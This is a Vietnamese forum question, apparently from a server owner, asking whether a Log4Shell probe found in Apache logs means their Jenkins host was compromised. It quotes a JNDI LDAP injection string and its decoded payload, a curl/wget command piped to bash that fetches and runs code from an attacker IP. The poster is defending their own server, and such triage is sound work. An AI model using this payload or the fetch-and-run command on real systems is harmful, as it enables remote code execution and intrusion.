khai thác log4j thành công hay chỉ là lưu lượng truy cập bình thường

Đầu tiên, cảm ơn trước và xin lỗi nếu tôi hỏi một số điều thực sự ngớ ngẩn, đây không phải là chuyên môn của tôi :)

Tôi có một máy chủ web chỉ để kiểm tra những thứ của mình. Tuần trước tôi đã kiểm tra xem log4j CVE có dễ bị tấn công hay không và có vẻ như chỉ Jenkins đang sử dụng một số dấu vết của log4j nhưng bên trong slf4j (https://www.slf4j.org/log4shell.html) dường như không dễ bị tổn thương trên phiên bản đó.

/var/lib/jenkins/plugins/ssh-slaves/WEB-INF/lib/log4j-over-slf4j-1.7.26.jar

Tôi đã cập nhật mọi thứ có thể để đảm bảo an toàn. Tôi đã để nó ở đó nhưng hôm nay tôi đang loay hoay với nhật ký apache và tôi bắt đầu thấy các mục như thế này:

195.54.160.149 - - [26/Dec/2021:10:43:35 +0100] "GET /?x=${jndi:ldap://195.54.160.149:12344/Basic/Command/Base64/longbase64HERE} HTTP/ 1.1" 200 90

Lưu ý: base64 đã chỉnh sửa sau khi được giải mã giống như:

(curl -s 195.54.160.149:5874/MYIP:443||wget -q -O- 195.54.160.149:5874/MYIP:443)|bash

Tôi đã chạy một số tập lệnh để phát hiện xem có thêm dấu vết của log4j trên máy chủ của mình hay không, nhưng mọi thứ dường như rõ ràng. Tôi có nên lo lắng rằng máy chủ đang phản hồi với mã 200 không? Cảm ơn